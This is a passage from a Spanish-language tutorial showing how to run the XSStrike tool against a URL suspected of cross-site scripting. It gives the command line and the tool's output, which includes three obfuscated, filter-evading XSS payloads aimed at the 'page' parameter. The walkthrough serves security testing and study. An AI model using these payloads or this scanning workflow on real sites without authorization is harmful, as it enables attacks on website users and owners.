Una vez echo todo esto, ya podremos utilizarla, por lo que copiaremos una URL que creamos que puede ser vulnerable a XSS y se la pasaremos a dicha herramienta de la siguiente forma:
sudopython3xsstrike.py-u"URL_Vuln"--timeout50
Info:
XSStrike v3.1.5
/home/dise0/Desktop/XSStrike/core/dom.py:27: SyntaxWarning: invalid escape sequence '\$'
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
/home/dise0/Desktop/XSStrike/core/dom.py:36: SyntaxWarning: invalid escape sequence '\$'
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
[~] Checking for DOM vulnerabilities
[+] Potentially vulnerable objects found
------------------------------------------------------------
------------------------------------------------------------ailed-td").innerHTML=lMessage;
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 5
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 15456
------------------------------------------------------------
[+] Payload: <HTml%09oNmOusEovER%0a=%0a(prompt)``>
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] y
------------------------------------------------------------
[+] Payload: <a%09onmOUSEOVEr%0a=%0aconfirm()%0dx>v3dm0s
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] y
------------------------------------------------------------
[+] Payload: <a/+/ONPOiNteREnTEr%0a=%0aa=prompt,a()>v3dm0s
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] n
De primeras nos indica que si es vulnerable a XSS y que el parametro en concreto seria el page, por lo que nos genera un payload y nos pregunta si queremos generar otro.
Si le damos a y podremos estar generando payloads y nos va diciendo el porcentaje que tiene de que funcione mas la confianza del mismo.
